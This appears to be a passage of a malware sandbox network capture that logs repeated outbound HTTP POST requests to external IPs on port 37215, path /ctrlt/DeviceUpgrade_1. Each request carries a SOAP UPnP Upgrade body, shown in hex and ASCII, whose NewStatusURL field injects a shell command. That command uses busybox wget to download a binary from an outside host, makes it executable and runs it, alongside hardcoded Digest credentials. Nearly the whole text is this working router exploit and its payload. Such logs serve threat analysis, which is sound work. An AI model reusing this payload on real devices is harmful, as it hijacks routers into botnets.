                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      15192.168.2.1450570102.104.207.20637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.623068094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.138149977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.746371984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.962161064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.586235046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.449954033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.177642107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      16192.168.2.1458548197.169.77.9937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.626228094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.170090914 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.810105085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
